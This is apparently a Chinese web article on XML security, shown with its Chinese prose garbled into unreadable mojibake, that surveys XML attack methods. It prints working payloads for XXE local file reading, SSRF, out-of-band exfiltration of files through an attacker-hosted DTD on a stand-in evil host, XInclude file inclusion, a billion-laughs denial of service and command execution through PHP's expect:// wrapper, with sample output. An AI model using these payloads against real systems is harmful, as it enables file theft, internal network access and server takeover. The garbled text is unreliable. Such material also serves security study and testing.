Äú¿ÉÒÔ¾èÖú£¬Ö§³ÖÎÒÃǵĹ«ÒæÊÂÒµ¡£

1Ôª 10Ôª 50Ôª





ÈÏÖ¤Â룺  ÑéÖ¤Âë,¿´²»Çå³þ?Çëµã»÷Ë¢ÐÂÑéÖ¤Âë ±ØÌî



  ÇóÖª ÎÄÕ ÎÄ¿â Lib ÊÓÆµ iPerson ¿Î³Ì ÈÏÖ¤ ×Éѯ ¹¤¾ß ½²×ù Modeler   Code  
»áÔ±   
 
   
 
 
     
   
 ¶©ÔÄ
  ¾èÖú
ÄãËù²»ÖªµÀµÄXML°²È«¡ªXML¹¥»÷·½·¨Ð¡½á
 
×÷ÕߣºÐ¡·É À´Ô´£º51CTO ·¢²¼ÓÚ£º2015-03-08
  5188  次浏览      31

XML¿ÉÀ©Õ¹±ê¼ÇÓïÑÔ£¬±»Éè¼ÆÓÃÀ´´«ÊäºÍ´æ´¢Êý¾Ý£¬ÆäÐÎʽ¶àÑù¡£Ä³Ð©ÔÚXMLÖб»Éè¼Æ³öÀ´µÄÌØÐÔ£¬±ÈÈç XML schemas(×ñÑ­XML Schemas ¹æ·¶)ºÍdocuments type definitions(DTDs)¶¼Êǰ²È«ÎÊÌâÀ´Ô´¡£×ÝÈ»±»¹«¿ªµÄÌÖÂÛÁËÉÏÊ®Ä꣬»¹ÊÇÓÐÒ»´óÅúÒ»´óÅúµÄÈí¼þËÀÔÚÕë¶ÔXMLµÄ¹¥»÷ÉÏ¡£

0x00 XML¼ò½é

XML¿ÉÀ©Õ¹±ê¼ÇÓïÑÔ£¬±»Éè¼ÆÓÃÀ´´«ÊäºÍ´æ´¢Êý¾Ý¡£ÆäÐÎʽ¶àÑù

ÀýÈ磺

1.Îĵµ¸ñʽ(OOXML£¬ODF,PDF,RSS,DOCX...)

2.ͼƬ¸ñʽ(SVG,EXIF Headers,...)

3.ÅäÖÃÎļþ(×Ô¶¨ÒåÃû×Ö£¬Ò»°ãÊÇ.xml)

4.ÍøÂçЭÒé(WebDAV,CalDAV£¬XMLRPC,SOAP,REST,XMPP,SAML,XACML,...)

ijЩÔÚXMLÖб»Éè¼Æ³öÀ´µÄÌØÐÔ£¬±ÈÈç XML schemas(×ñÑ­XML Schemas ¹æ·¶)ºÍdocuments type definitions(DTDs)¶¼Êǰ²È«ÎÊÌâÀ´Ô´¡£×ÝÈ»±»¹«¿ªµÄÌÖÂÛÁËÉÏÊ®Ä꣬»¹ÊÇÓÐÒ»´óÅúÒ»´óÅúµÄÈí¼þËÀÔÚÕë¶ÔXMLµÄ¹¥»÷ÉÏ¡£

ÆäʵXMLʵÌå»úÖÆºÜºÃÀí½â£¬¿ÉÒÔÖ±½ÓÓá°×ªÒ塱À´Àí½â£º&#x25ºÍ&foo´ÓԭʼÒâÒåÉÏÀ´ËµÊÇÒ»ÑùµÄ£¬Ö»ÊǺóÕßÊÇÓÉÎÒÃÇ×Ô¼ºÀ´¶¨ÒåÈÎÒâÄÚÈÝ¡£

ÄÃDTDÀ´Ëµ£¬DTDÖÐÄÜÉùÃ÷ʵÌåÀ´¶¨Òå±äÁ¿(»òÊÇÎÄ×ÖÀàµÄºê)£¬ÒÔ±ãÔÚ½ÓÏÂÀ´µÄDTD»òÕßXMLÎĵµÖÐʹÓá£Ò»°ãʵÌåÔÚDTDÖж¨Ò壬ÓÃÀ´·ÃÎÊÄÚ²¿×ÊÔ´£¬»ñÈ¡ÀïÃæµÄÎÄ×Ö²¢ÓÃÀ´Ìæ»»×Ô¼ºµÄxmlÎĵµ£¬¶øÍⲿʵÌåÓÃÀ´·ÃÎÊÍⲿ×ÊÔ´(Ò²¾ÍÊÇ˵£¬ÕâЩ×ÊÔ´ÄÜÀ´×Ô±¾µØ¼ÆËã»ú£¬Ò²¿ÉÒÔÊÇÔ¶³ÌÖ÷»ú)¡£ÔÚ½âÎöÍⲿʵÌåµÄ¹ý³ÌÖУ¬XMLµÄ·ÖÎöÆ÷¿ÉÄÜ»áʹÓÃÖÚ¶àÍøÂçЭÒéºÍ·þÎñ(DNS,FTP,HTTP,SMBµÈµÈ)ÕâÈ¡¾öÓÚURLsÀïÃæ±»Ö¸¶¨³Éʲô¡£ÍⲿʵÌåÓÃÀ´´¦ÀíÄÇЩʵʱ¸üеÄÎĵµÊǺÜÓÐÓõģ¬È»¶ø£¬¹¥»÷Ò²ÄÜÔÚ½âÎöÍⲿʵÌåµÄ¹ý³ÌÖз¢Éú¡£¹¥»÷ÊֶΰüÀ¨£º

1.¶ÁÈ¡±¾µØÎļþ(¿ÉÄܰüº¬Ãô¸ÐÐÅÏ¢ /etc/shadow)

2.ÄÚ´æÇÖ·¸

3.ÈÎÒâ´úÂëÖ´ÐÐ

4.¾Ü¾ø·þÎñ

±¾ÎĽ«¶Ô³¤ÆÚÒÔÀ´³öÏÖµÄxml¹¥»÷·½·¨½øÐÐÒ»¸ö×ܽᡣ

0x01 ³õʶXMLÍⲿʵÌå¹¥»÷

»ùÓÚÍⲿʵÌåµÄÎļþ°üº¬

×îÔç±»Ìá³öµÄXML¹¥»÷·½·¨ÊÇÀûÓÃÍⲿʵÌåµÄÒýÓù¦ÄÜÀ´ÊµÏÖÈÎÒâÎļþ¶ÁÈ¡

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE updateProfile [
<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>
<updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname>
...
</updateProfile>

È»¶øÕâÖÖ¶ÁÈ¡ÊÇÓÐÏÞÖÆµÄ£¬ÒòΪxmlµÄ½âÎöÆ÷ÒªÇó±»ÒýÓõÄÊý¾ÝÊÇÍêÕûµÄ£¬ÎÒÃÇʹÓÃÒ»¸öÀý×ÓÀ´½âÊÍʲôÊÇÍêÕû¡£

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE simpleDocument [
<!ENTITY first "<my">
<!ENTITY second "tag/>"> ]>
<simpleDocument>&first;&second;</simpleDocument>

ÈçÉϵÄxmlÎĵµµ±·¢Ë͸ø·þÎñÆ÷ʱ£¬Êµ¼ÊÉÏÊÇ»á²úÉúÒ»¸ö´íÎóµÄ ÆäÖÐËäÈ»ÔÚ×éºÏÔÚÒ»ÆðʱÊÇÄܹ»ÍêÃÀ±ÕºÏµÄ£¬µ«ÊÇÕâЩʵÌåÓÉÓÚÔÚµÚ3£¬4Ðоͱ»½âÎöÒ»´Î£¬´ËʱÓÉÓÚ²»ÊÇÍêÃÀ±ÕºÏµÄ£¬¾Í»áÅ׳öÒ»¸ö´íÎó¡£

ÕâÖÖ´íÎóÈÃxml¹¥»÷Ò»¶È±äµÃ¼¦À߯ðÀ´£¬ÒòΪʵ¼ÊÉϺܶàÎļþ¶¼ÊÇ¡°Î´±ÕºÏÐÎʽ¡±µÄ£¬±ÈÈçÔÚphpÎļþÍÆ¼öµÄд·¨ÖоÍÊÇÖ»ÓÐÇ°ÃæÒ»¸ö"
¸üÔã¸âµÄÊÇ£¬µ±ÄãÑ¡Ôñ°üº¬µÄÊÇÒ»¸öÍêÕûµÄxmlÎļþ(±ÈÈçÊý¾Ý¿âÁ¬½ÓÎļþ)µÄʱºò£¬·µ»Ø½á¹û½«ÊÇ

¿ÉÒÔ¿´µ½£¬ÔÚ±êÇ©ÖеÄÊý¾Ý¿âÅäÖÃÎĵµ±»Ç¶Èëʱ£¬´ó²¿·ÖÄÚÈݶ¼ÊÇÊ¡ÂԺţ¬Ö»ÏÔʾÁËÎĵµµÄ½á¹¹¡£ÕâÊÇÓÉxml parserÌØÐÔ¾ö¶¨µÄ¡£

URL Invocation

XML¹¥»÷ÖÐÓÐÒ»¿é³£³£±»ºöÊÓ£¬ÄǾÍÊÇÀûÓÃURL»úÖÆÒÔ¼°ËûÃǵÄÒ»Ð©Ææ¹ÖµÄÌØÐÔÀ´À©´ó¹¥»÷Ãæ¡£

ËäÈ»XML¹æ·¶²¢Ã»ÓÐÒªÇóÖ§³ÖÈκÎÌØ¶¨µÄURL»úÖÆ£¬µ«Ðí¶àƽ̨µÄµ×²ãÍøÂç¿âÈ´Ö§³ÖÁ˼¸ºõËùÓÐURL»úÖÆ¡£

½èÖúURLs£¬¹¥»÷Õß¿ÉÒÔÈÃÔËÐÐ×ÅXMLparserµÄÖ÷»úÏòµÚÈý·½Ö÷»ú·¢Æð¶ñÒâÇëÇó.

±ÈÈç¡°server-side request forgery¡±(ssrf).ÀíÂÛÉÏÀ´Ëµ£¬URL InvocationÉõÖÁ¿ÉÒÔÓÃÀ´·¢ÆðÄÚ²¿ÍøÂçÖеĺéË®¹¥»÷¡£

´ó²¿·ÖÈ˲»ÖªµÀµÄÊÇ£¬¼´Ê¹ÍⲿʵÌå±»½ûÓÃÁË£¬Ðí¶àxml parsers»¹ÊÇ»áÈ¥½âÎöÄÇЩURL¡£¾Ù¸öÀý×Ó£¬Ò»Ð©parsers»áÔÚÎĵµ¶¨Òå½×¶Î¶Ôurl·¢ÆðÇëÇó

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf">
<roottag>Õâ²»ÊÇʵÌå¹¥»÷£¡</roottag>

³ýÁËÍⲿʵÌåºÍ»ùÓÚDOCTYPEµÄSSRF¹¥»÷Ö®Í⣬XML SchemaÌṩÁËÁ½¸öÔÚʵÀýÎĵµÖÐʹÓõÄÌØÊâÊôÐÔ£¬ÓÃÓÚÖ¸³öģʽÎĵµµÄλÖá£ÕâÁ½¸öÊôÐÔÊÇ£ºxsi:schemaLocationºÍxsi:noNamespaceSchemaLocation£¬Ç°ÕßÓÃÓÚÉùÃ÷ÁËÄ¿±êÃû³Æ¿Õ¼äµÄģʽÎĵµ£¬ºóÕßÓÃÓÚûÓÐÄ¿±êÃû³Æ¿Õ¼äµÄģʽÎĵµ£¬ËüÃÇͨ³£ÔÚʵÀýÎĵµÖÐʹÓá£

<roottag xmlns="http://schema/namespace/primary" 
xmlns:secondaryns="http://schema/namespace/secondary"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://schema/namespace/primary
<p>
<secondaryns:s>
...
</secondaryns:s>
</p>
</roottag>

http://location/of/remote/schema/primary.xsd


http://schema/namespace/secondary

http://location/of/remote/schema/secondary.xsd">

ÔÚÕâ¸ö°¸ÀýÖУ¬ËùÓдøÓÐsecondaryns:ǰ׺µÄ¶¼»á×ñÑ­ÔÚxmlns:secondarynsÖж¨ÒåµÄ»úÖÆ¡£ÓÉÓÚDOCTYPE¶¨Òå²»ÄܳöÏÖÔÚÎĵµµÄÖв¿£¬ËùÒÔµ±ÎÒÃÇÖ»¶ÔÎĵµÄ³¸ö²¿·Ö¿É¿ØµÄʱºò£¬¾ÍÄÜÀûÓÃschema_Location(http://location/of/remote/schema/primary.xsd)·¢Æðssrf¡£(ǰÌáÊÇһЩÉèÖÃÐèÒªÉèÖÃΪon£¬È»¶øÎÒÃDz¢Ã»ÓжÔÿ¸öxml parser½øÐгä·ÖµÄ²âÊÔÀ´Ñо¿²»Í¬»·¾³ÏÂÓÐʲôҪÇóÄÜÈÃÎÒÃǽøÐÐssrf¹¥»÷£¬ËùÒÔÕâÒ²ÊÇÒ»¸ö´ýÑо¿µÄ·½Ïò£¬ÓÐÐËȤµÄwooyuner¿ÉÒÔ½»Á÷~)

0x02 ÒýÈë²ÎÊýʵÌåºóµÄ¹¥»÷ÊÖ¶Î

µ±ÎÒÃǵĶñÒâxml±»³É¹¦½âÎö£¬ÕâʱÎÒÃÇÓпÉÄÜÃæÁÙÁ½¸öÎÊÌ⣺

Ò»£¬Êý¾Ýδ±ÕºÏµ¼ÖÂǶÈëʧ°Ü(±ÈÈçÖ»´æÔÚ

¶þ£¬·þÎñÆ÷½øÐÐÏÞÖÆµ¼ÖÂÊý¾Ý²»ÄÜ·µ»Ø¡£

ÒýÈë²ÎÊýʵÌåÖ®ºó£¬ÕâÁ½¸öÎÊÌâ¾ÍÄܵõ½½â¾ö¡£

²ÎÊýʵÌåÒÔ%¿ªÍ· ÎÒÃÇʹÓòÎÊýʵÌåÖ»ÐèÒª×ñÑ­Á½ÌõÔ­Ôò£º

²ÎÊýʵÌåÖ»ÄÜÔÚDTDÉùÃ÷ÖÐʹÓᣠ²ÎÊýʵÌåÖв»ÄÜÔÙÒýÓòÎÊýʵÌå¡£

CDATAתÒåµÄÃîÓÃ

CDATA²¿¼þ;ÔÚCDATA²¿¼þµÄËùÓÐÄÚÈݶ¼»á±»XML½âÎöÆ÷ºöÂÔ£¬¼´CDATA²¿¼þÀïÃæµÄÄÚÈݽô½ôÕâÊÇÒ»¸ö×Ö·û´®Îı¾µÄ×÷Óá£Ò»¸ö CDATA ²¿¼þÒÔ""±ê¼Ç½áÊø¡£ÄÇôÎÒÃÇÄܲ»Äܹ¹ÔìÒ»¸öÕâÑùµÄÒ³ÃæÀ´·µ»ØÄÇЩÎļþÄØ

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/fstab">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
%dtd;
]>
<roottag>&all;</roottag>

combine.dtdÈçÏÂ

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

Ç°ÃæÒ²Ìáµ½¹ý£¬µ±xml parsers»á°ÑxmlµÄ²ÎÊýʵÌå% start % endÂíÉϽâÊÍ£¬ÓÉÓÚûÓÐ±ÕºÏ ¾Í»áÅ׳ö´íÎó£¬ÄÇôÕâÀïµÄ%startΪºÎÄÜÕý³£µØ½âÎöÄØ? ÕâÊÇÒòΪ²ÎÊýʵÌåµÄÒýÓò»ÐèÒªÔÚxmlÎĵµ½âÎöµÄʱºò±£³Öxml±ÕºÏ£¬ÕâÑù¾ÍÈÆ¹ýÁËÏÞÖÆ¡£

ͨ¹ýÕâÑùÎÒÃǾÍÄܶÁÈ¡ËùÓÐÊý¾ÝÁË(base64±àÂëÒ²¿É)

Íâ´øÊý¾Ýbypass»ØÏÔÏÞÖÆ

ÁíÒ»ÖÖʹÓòÎÊýʵÌåµÄÊֶξÍÊÇÍâ´øÊý¾ÝÁË¡£

ÀûÓòÎÊýʵÌ壬ÎÒÃÇÄܹ»°ÑÐèÒª¶ÁÈ¡µÄÎļþͨ¹ýһЩЭÒé(http ftpµÈ)·¢Ë͵½ÎÒÃǵķþÎñÆ÷ÉÏ£¬ÄÇôͨ¹ýÈÕÖ¾²é¿´¾ÍÄÜ»ñÈ¡Êý¾ÝÁË ÎÒÃÇ¿ÉÒÔÕâô¹¹Ôì

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [  
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://example.com/evil.dtd"> %dtd;]>
<roottag>&send;</roottag>

È»ºóÔÚÎÒÃǿɿصÄhttp://example.com/

·ÅÖÃÈçÏÂDTD

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>"> %all;

Á÷³ÌÈçÏÂ

XXEµÄÆæÃŶݼ×

»ùÓÚXIncludeµÄÎļþ°üº¬

XIncludeÌṩÁËÒ»ÖÖ½ÏΪ·½±ãµÄÈ¡»ØÊý¾ÝµÄ˼·(ÔÙÒ²²»Óõ£ÐÄÊý¾Ý²»ÍêÕû¶øµ¼ÖÂparserÅ׳öÒ»¸ö´íÎó)¶øÎÒÃÇÄܹ»Í¨¹ýparseÊôÐÔ£¬Ç¿ÖÆÒýÓÃÎļþµÄÀàÐÍ¡£

<root xmlns:xi="http://www.w3.org/2001/XInclude"> 
<xi:include href="file:///etc/fstab" parse="text"/>
</root>

²»¹ýXincludeÐèÒªÊÖ¶¯¿ªÆô£¬²âÊÔ·¢ÏÖËùÓÐxml parser¶¼Ä¬ÈϹرÕÕâÒ»ÌØÐÔ¡£

¾Ü¾ø·þÎñ

XXE¹¥»÷Ò²ÄÜÓÃÀ´·¢Æð¾Ü¾ø·þÎñ¹¥»÷

ÈçϵĵݹéÒýÓ㬴ÓÏÂÖÁÉÏÒÔÖ¸ÊýÐÎʽÔö¶à

<?xml version="1.0"?> 
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

»ØÒäһϽâÎö¹ý³Ì£¬µ±XML´¦ÀíÆ÷ÔØÈëÕâ¸öÎĵµµÄʱºò£¬Ëü»á°üº¬¸ùÔªËØ£¬¶øÀïÃæ¶¨ÒåÁËʵÌå&lol9 £¬¶ø19ʵÌåÀ©Õ¹³ÉÁ˰üº¬ÁË¡°&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;¡±Õâ¸ö×Ö·û´®¡£

Èç´ËµÝ¹éÉÏÈ¥£¬Ñ¹ÈëÄÚ´æµÄ¶«Î÷³ÊÖ¸ÊýÔö³¤£¬ÊµÑé·¢ÏÖ£¬Ò»¸öСÓÚ1KBµÄXML¹¥»÷payloadÄÜÏûºÄ3GBµÄÄÚ´æ¡£

ÌØ¶¨»·¾³ÏµĹ¥»÷ºÍÏÞÖÆ

Java&Xerces

ĬÈϵÄOracle's Java Runtime EnvironmentϵÄXML parserÊÇXerces£¬Ò»¸öapacheµÄÏîÄ¿¡£¶øXercesºÍJavaÌṩÁËһϵÁеÄÌØÐÔ£¬ÕâÐ©ÌØÐÔÓÖÄܵ¼ÖÂһЩÑÏÖØµÄ°²È«ÎÊÌâ¡£ÉÏÊöµÄÄÇЩ¹¥»÷ÊÖ·¨(DOCTYPEs for SSRF,Îļþ¶ÁÈ¡,²ÎÊýʵÌåµÄÍâ´øÊý¾Ý)ÔÚjavaµÄĬÈÏÅäÖÃÏÂÄܹ»ÔËÓÃ×ÔÈç,java/XercesÒ²Ö§³ÖXInclude µ«ÊÇÐèÒªsetXIncludeAware(true) ºÍsetNamespaceAware(true)¡£

java¹æ·¶Äܹ»Ö§³ÖÈçϵÄURL»úÖÆ

http
https
ftp
file
jar

ÁîÈ˳ԾªµÄÊÇJavaµÄfileЭÒéÄܹ»ÓÃÀ´ÁÐĿ¼£¬±ÈÈç˵£¬ÔÚlinuxÏÂÃæ¡°file:///¡±»áÁгö/Ŀ¼ÏÂËùÓж«Î÷£º

bin
boot
dev
etc
home
...

jarЭÒéjar:http://host/application.jar!/file/within/the/zip»áµ¼Ö·þÎñÆ÷Ê×ÏÈÈ¡µÃÎļþÈ»ºó½âѹÕâ¸öÒÔjar¿ªÍ·!½áβµÄ°ü ²¢ÌáÈ¡ºóÃæµÄÎļþ¡£´Ó¹¥»÷ÕߵĽǶȿ´£¬ÍêÈ«Äܹ»¶¨ÖÆÒ»Ð©¸ßѹËõ±ÈµÄ°ü(±ÈÈç1000£º1)ÕâЩZIPÕ¨µ¯ÄÜÓÃÀ´¹¥»÷·´²¡¶¾ÏµÍ³£¬»òÕßÓÃÀ´ÏûºÄÄ¿±ê»úµÄÓ²ÅÌ/ÄÚ´æ×ÊÔ´¡£×¢Ò⣬jar URLsÄÜÔÚÈκνÓÊÜDOCTYPE¶¨ÒåµÄJAVA XercesϵͳÉÏʹÓá£ËùÒÔ£¬¼´Ê¹ÍⲿʵÌ幨±ÕÁË£¬»¹ÊÇÄܹ»½øÐй¥»÷¡£

php&expectµÄRCE

ºÜÒź¶£¬Õâ¸öÀ©Õ¹²¢²»ÊÇĬÈϰ²×°µÄ£¬È»¶ø°²×°ÁËÕâ¸öÀ©Õ¹µÄXXE©¶´£¬ÊÇÄܹ»Ö´ÐÐÈÎÒâÃüÁî¡£

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> 
<dir>
<file>&cmd;</file>
</dir>

ÄÇô¾Í»á·µ»ØÈçÏÂ

<file>uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf),
12(everyone),61(localaccounts),79(_appserverusr),80(admin),
81(_appserveradm),98(_lpadmin),401(com.apple.sharepoint.group.1),
33(_appstore),100(_lpoperator),204(_developer),
398(com.apple.access_screensharing),399(com.apple.access_ssh)<file>

xml×¢Èë

Õâ¸öºÍxxe¹¥»÷¹ØÏµ²¢²»´ó£¬µ«ÊDZ¾ÎÄÌÖÂÛµÄÊÇXML°²È«£¬ËùÒÔÕâ¸ö×ÔȻҲ¾ÍÊÕ¼½øÀ´

$GLOBALS["HTTP_RAW_POST_DATA"]ÔÚphpÖб»ÉèÖóÉÁË¡°²»×ªÒ塱£¬Ò»µ©³ÌÐòͨ¹ýʵÌå»ñÈ¡Êý¾Ýºó£¬Ö±½Ó´øÈëÁËMysql×îºóÔì³É×¢Èë

°¸ÀýÈçÏÂ

WooYun: PHPYUN×îаæXML×¢Èë¼°SQL×¢Èë»ñÈ¡¹ÜÀíÔ±Õ˺Å(ÎÞÊÓÈκηÀÓù)

0x03 ×ܽá

XXE¹¥»÷×ÜÔÚ±»ºöÊÓ

¿ª·¢ÕßÍùÍù˵£º

¹¥»÷ÍþвС..

¹Ø±ÕʵÌå¾ÍÄÜÍêÈ«±ÜÃâ...

XMLʵÌå¹¥»÷ÊÇɶ?

È»¶ø£¬xmlʵÌå¹¥»÷ÔÙÉÏÊöµÄ¹¥»÷ÖÐÒÑÈ»²úÉúÁ˺ܶà³öºõ¿ª·¢ÕßÒâÁϵÄÍþв¡£

   
5188 ´Îä¯ÀÀ       31
 
Ïà¹ØÎÄÕÂ

iOSÓ¦Óð²È«¿ª·¢£¬Äã²»ÖªµÀµÄÄÇЩÊÂÊõ
Web°²È«Ö®SQL×¢Èë¹¥»÷
ÒÆ¶¯APP°²È«ÔÚÉøÍ¸²âÊÔÖеÄÓ¦ÓÃ
´ÓGoogle±¸·Ý»¥ÁªÍø¿´¡°Êý¾Ý°²È«¡±
 
Ïà¹ØÎĵµ

web°²È«Éè¼ÆÓë·À»¤
»¥ÁªÍøº£Á¿ÄÚÈݰ²È«´¦Àí¼¼Êõ
ºÚ¿Í¹¥»÷Óë·À·¶¼¼Êõ
WEBºÚºÐ°²È«¼ì²â
 
Ïà¹Ø¿Î³Ì

WEBÍøÕ¾ÓëÓ¦Óð²È«Ô­ÀíÓëʵ¼ù
webÓ¦Óð²È«¼Ü¹¹Éè¼Æ
´´½¨°²È«µÄJ2EE WebÓ¦ÓôúÂë
ÐÅÏ¢°²È«ÎÊÌâÓë·À·¶
×îл¼Æ»®
DeepSeek´óÄ£ÐÍÓ¦Óÿª·¢ 6-12[ÏÃÃÅ]
È˹¤ÖÇÄÜ.»úÆ÷ѧϰTensorFlow 6-22[Ö±²¥]
»ùÓÚ UML ºÍEA½øÐзÖÎöÉè¼Æ 6-30[±±¾©]
ǶÈëʽÈí¼þ¼Ü¹¹-¸ß¼¶Êµ¼ù 7-9[±±¾©]
Óû§ÌåÑé¡¢Ò×ÓÃÐÔ²âÊÔÓëÆÀ¹À 7-25[Î÷°²]
ͼÊý¾Ý¿âÓë֪ʶͼÆ× 8-23[±±¾©]

iOSÓ¦Óð²È«¿ª·¢
Web°²È«Ö®SQL×¢Èë¹¥»÷
APP°²È«ÔÚÉøÍ¸²âÊÔÖеÄÓ¦ÓÃ
³õ̽PHPµÄSQL×¢Èë¹¥»÷µÄ¼¼Êõ
´ÓGoogle±¸·Ý¿´¡°Êý¾Ý°²È«¡±


WEBÍøÕ¾ÓëÓ¦Óð²È«Ô­ÀíÓëʵ¼ù
webÓ¦Óð²È«¼Ü¹¹Éè¼Æ
´´½¨°²È«µÄJ2EE WebÓ¦ÓôúÂë
×¢²áÐÅÏ¢°²È«×¨ÒµÈËÔ±(CISP)
ÐÅÏ¢°²È«¹ÜÀí
ÐÅÏ¢°²È«ÎÊÌâÓë·À·¶


ÖйúÒøÐÐ ÐÅÏ¢°²È«¼¼Êõ¼°Éî¶È·ÀÓù
WebÓ¦Óð²È«¼Ü¹¹¡¢ÈëÇÖ¼ì²âÓë·À»¤
ij²ÆË°ÁìÓòÖªÃûIT·þÎñÉÌ Web°²È«²âÊÔ
ÆÕÈð¿Ë˹ web°²È«Éè¼Æ¡¢²âÊÔÓëÓÅ»¯
±±¾©ºÍÀûʱ ÐÔÄܺͰ²È«ÐÔ²âÊÔ
SUNÖйú¹¤³ÌÑо¿Ôº JSF¿ò¼Ü¡¢°²È«